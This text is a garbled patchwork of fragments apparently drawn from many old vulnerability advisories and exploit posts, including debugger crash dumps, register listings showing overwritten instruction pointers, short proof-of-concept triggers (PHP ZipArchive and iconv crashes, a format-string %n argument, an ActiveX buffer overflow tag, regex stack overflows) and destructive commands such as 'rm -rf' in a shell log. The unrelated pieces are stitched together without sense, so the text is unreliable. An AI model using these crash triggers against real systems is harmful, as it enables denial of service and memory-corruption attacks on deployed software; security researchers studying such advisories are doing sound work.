Access violation
return 0;
}
# /usr/local/bin/gcc -o jaja2 jaja2.c
# ./jaja2 512
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q jaja2
(no debugging symbols found)
(gdb) r 512
Starting program: /jaja2 512
(no debugging symbols found)
127# pwd
/home/cxib
127# du /home/
4 /home/cxib/.ssh
Segmentation fault (core dumped)
127# rm -rf Samotnosc
Segmentation fault (core dumped)
127# chmod -R 000 Samotnosc
Segmentation fault (core dumped)
There are many attack vectors.
grep(1):
cx@cx64:~$ ls |grep -E ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
pgrep(1):
cx@cx64:~$ pgrep ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
We need to use 1..8000 or a bigger value to cause the stack overflow.
As a result:
# du X
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q du
(no debugging symbols found)
(gdb) r X
Starting program: /usr/bin/du X
(no debugging symbols found)
and compile it, we can manipulate the format string.
Let's try to run example:
cxib# ./pln %99999999999999999999n
Segmentation fault (core dumped)
What is wrong? Let's see
cxib# gdb -q pln
(no debugging symbols found)...
(gdb) r %99999999999999999999n
1. In a PE file, the IMAGE_IMPORT_DESCRIPTOR contains fields named
OriginalFirstThunk and FirstThunk. Both of them point to an array of
IMAGE_THUNK_DATA structures. The structure may contain an RVA address
of the name of the imported function. If this pointer to the name of
the function is invalid, Fileinfo raises an Access Violation
exception, which being unhandled, causes Denial of Service condition.
This ends up terminating both Fileinfo plugin and the Total Commander
process.
2. In a PE file, the IMAGE_EXPORT_DIRECTORY contains a field named
iconv(1, $a, 1);
?>
(gdb) run 1.php
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1217608000 (LWP 29444)]
0xb76ed3e5 in iconv_close () from /lib/tls/libc.so.6
2) iconv_mime_decode_headers()
uint8 padding_length;
};
*/
} GenericBlockCipher;
This will cause a segmentation fault, when the ciphertext_to_compressed
function tries to give decrypted data to _gnutls_auth_cipher_add_auth for HMAC
verification, even though the data length is invalid, and it should have
returned GNUTLS_E_DECRYPTION_FAILED or GNUTLS_E_UNEXPECTED_PACKET_LENGTH
instead, before _gnutls_auth_cipher_add_auth was called.
Maybe I have formulated this question badly. I mean that if we can overwrite the return address of the function properly (without an access violation) then we can overwrite SEH properly (without an access violation), and if we can overwrite SEH properly then we can overwrite the return address properly. So it seems (to me) that an SEH overwrite is equivalent to a return address overwrite. Since the return address is simpler to handle, there is no need to play with SEH. So why do hackers play with it? (I am talking here only about the default SEH, which is encountered during an access violation - i.e. http://www.milw0rm.com/exploits/4651.) Maybe I am missing something very important here.
best,
opexoc
Execution of code : NO
Privilege escalation : NO
Discovered by : INTECO-CERT - David Reguera Garcia <david.reguera@inteco.es>
Exploit by : INTECO-CERT - David Reguera Garcia <david.reguera@inteco.es>
Description : When elfdump analyzes an "evil" elf, the application crashes
and causes a Segmentation fault: 11
Affected OS:
- FreeBSD:
- 5.5 - TESTED AND FOUND
- 6.2 - TESTED AND FOUND
- 6.3 - TESTED AND FOUND
<?php
unlink("empty.zip");
fopen("empty.zip","a");
$nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("*",333333),0x39);
?>
cx@cx64:/www$ php zip.php
Segmentation fault
---linux/ubuntu---
Tested with NetBSD glob(3) implementation (netbsd 5.1 and PHP 5.3.6)
To see the difference:
[cx@82 /www]$ php define.php 8999999
Out of memory
[cx@82 /www]$ php define.php 9999999
Segmentation fault: 11
(gdb) bt
#0 0x28745eb0 in strrchr () from /lib/libc.so.7
#1 0x0822d538 in zend_register_constant (c=0xbfbfcfb0)
at /usr/ports/lang/php5/work/php/Zend/zend_constants.c:429
Authentication is required to exploit this vulnerability.
Debugger Results:
(ea8.aec): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=734c4d90 ecx=035efe24 edx=00000193 esi=035efe24 edi=035efe24
eip=62408f23 esp=035efd20 ebp=035efd6c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
could not find
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA"
%SYSTEM-F-ACCVIO,
access violation, reason mask=00, virtual address=4141414141414140,
PC=4141414141414140, PS=0000001B%SYSTEM-F-ACCVIO, access violation,
reason mask=00, virtual address=4141414141414140, PC=4141414141414140,
PS=0000001B Improperly handled condition, image exit forced.
Improperly handled condition, image exit forced. Signal arguments:
Number = 0000000000000005
functional exploit
(URL of the demo can be found in the references section of this advisory)
It should be noted that the vulnerable code is wrapped by an SEH handler which doesn't crash the application on Access Violation. This means that the exploitation process may try different base addresses and offsets in case of a failure.
Attack vector:
Title: Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities
0x01. Description:
Memory exhaustion in Firefox 3.6.3 (latest) <= makes Firefox unable to render text into the body element, and then it crashes.
( raise an exception using PoC #1, lower memory area read access violation using PoC #2 )
Of course, a variation of the PoC produced a NULL pointer dereference, so code execution may also be possible ( 0.1 % ). :-)
URL: http://www.x90c.org/advisories/firefox_3.6.3_crash_advisory.txt
Vendor Status: unpatched. ( so far no reliable exploit exists, so I disclosed to bugtraq first )
Buffer Overflow in AxRUploadServer.dll, this file belongs to ImageStation that is a servicemark of Sony Electronics Inc.
--------------
Access Violation at 0x42424242
The code:
<object classid='clsid:E9A7F56F-C40F-4928-8C6F-7A72F2A25222' id='bof'></object>
<input language=VBScript onclick=Son() type=button value="Explotar">
22/06/2010 14:53:36.650 editcp (372968) Recibida señal (sig=11).
bash-3.2# /tmp/dbx -C core
reading symbolic information ...warning: no source compiled with -g
Segmentation fault in lsConnectionCached at 0x10008298
0x10008298 (lsConnectionCached+0x54) 7d69582e lwzx r11,r9,r11
(/tmp/dbx) where
lsConnectionCached(0x41ffffff) at 0x10008298
SOCKSclose(0x41ffffff) at 0x10006548
============================
The crash is not immediate, but there are actually two ways to trigger it and I believe they are separate problems.
The following will cause Safari to crash with “Access violation reading [00000000]”.
* Window->Activity
Whereas these will crash Safari with “Access violation writing to [BBADBEEF]”
"C:\Oracle\Middleware3\EPMSystem11R1\products\biplus\\bin\\brioqry.exe" "%1"
crash dump, eip and seh overwritten, unicode expanded,
I suppose one should be able to deal with it :
(208.152c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008b ebx=00000000 ecx=0e752eb8 edx=0f490000 esi=0e6b3d60 edi=0012a338
eip=00410043 esp=0012a2d8 ebp=0012a2ec iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
Apple Safari is the default web browser included on the Apple iPhone. A
vulnerability has been found in the 'WebKit' library used by Safari
on the iPhone. By inserting a special string into the 'alert()' JavaScript
method, it's possible to crash Safari via an out-of-bounds memory read
triggering an access violation.
4. *Vulnerable packages*
. iPhone v1.1.4 and v2.0
668E239A F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] <----- Crash Here
EDI = 0x089A0020
ESI = 0x61626364
(3e8.e3c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=61626560 ebx=00000000 ecx=0000007f edx=00000000 esi=61626364 edi=06d80020
eip=668e239a esp=0012dfbc ebp=0012dfc4 iopl=0 nv up ei pl nz na pe nc
...
}
--- CUT ---
Because the variable 'in' is of type 'char', characters above 0x80 lead to negative indices.
This vulnerability may lead to an out-of-bound read and theoretically cause a Segmentation Fault (Denial of Service attack).
Unfortunately I couldn't find any binaries where the .rodata section before the base64_reverse_table
table causes this situation.
I have added some extra debug output in the lighttpd source code to see if this vulnerability is
triggered correctly. Here is the output for one of the examples:
> could not find
> "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAA"
> %SYSTEM-F-ACCVIO,
> access violation, reason mask=00, virtual address=4141414141414140,
> PC=4141414141414140, PS=0000001B%SYSTEM-F-ACCVIO, access violation,
> reason mask=00, virtual address=4141414141414140, PC=4141414141414140,
> PS=0000001B Improperly handled condition, image exit forced.
> Improperly handled condition, image exit forced. Signal arguments:
> Number = 0000000000000005
This attempts to connect to the domain after the @, using the first word or letters that we have; this does not work today, because it is obvious that the first two are together, and most browsers ask for permission before such an action. What is going on in Safari with this technique, which makes it possible to do this without asking you for permission to enter the site, is that there is some character that Safari interprets as "invisible"; by creating a link with the fake user domain followed by a large number of "invisible" characters, and lastly the @ domain to enter, this leads to falsification of the site.
Another flaw is that when Safari writes on the same page with a "document.write" in an infinite while loop, the browser may break, causing the following crash:
Access violation when writing to [0FDFFFEE]
Finally, there is a certain character that causes Safari to break when making a link to "file://"; this produces the following failure:
Access violation when reading [00000004]
(gdb) r -X
Starting program: /usr/local/apache/bin/httpd -X
[Sun Dec 27 05:03:19 2009] [alert] httpd: Could not determine the server's fully
qualified domain name, using 127.0.0.1 for ServerName
Program received signal SIGSEGV, Segmentation fault.
0x0000003fec682958 in memcpy () from /lib64/libc.so.6
Missing separate debuginfos, use: debuginfo-install expat-2.0.1-6.fc11.1.x86_64
glibc-2.10.1-5.x86_64 nss-softokn-freebl-3.12.4-3.fc11.x86_64
(gdb) bt
#0 0x0000003fec682958 in memcpy () from /lib64/libc.so.6
ModLoad: 5b860000 5b8b4000 C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 769c0000 76a73000 C:\WINDOWS\system32\USERENV.dll
(26c8.1818): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=019dc690 ecx=00000000 edx=00000000 esi=0199ffb0 edi=0199fe20
eip=0036a9ba esp=0012d864 ebp=0037b3e0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
*** WARNING: Unable to verify checksum for C:\Program Files\Xilisoft\Video Converter 3\avformat.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Xilisoft\Video Converter 3\avformat.dll -
avformat!yuv4mpeg_init+0x6e06:
0036a9ba 8a6811 mov ch,byte ptr [eax+11h] ds:0023:00000011=??
Who knows?
5 Crash info:
===============
(d10.ff4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01fff21d ebx=00000000 ecx=0367ffb0 edx=00000076 esi=019c5ff8
edi=03610e68
eip=675b347e esp=02314de0 ebp=02314e24 iopl=0 nv up ei pl nz na
Note (added 30/05/2009, remote vector added): it works with network folders
too ...
against a win2k3 where explorer.exe is not patched with /GS flag:
(f44.104): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02100068 ebx=772a23c1 ecx=0210cefa edx=00000823 esi=00610061 edi=00000000
eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
faultmon dump of oovoo.exe processing the url given:
...
04:22:10.875 pid=0E10 tid=0C08 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [0000005A])
----------------------------------------------------------------
EAX=00000066: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00133D44: 6F 00 6F 00 76 00 6F 00-6F 00 3A 00 00 00 0F 00
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=01D0DC28: 63 00 61 00 6C 00 6C 00-74 00 6F 00 3A 00 00 00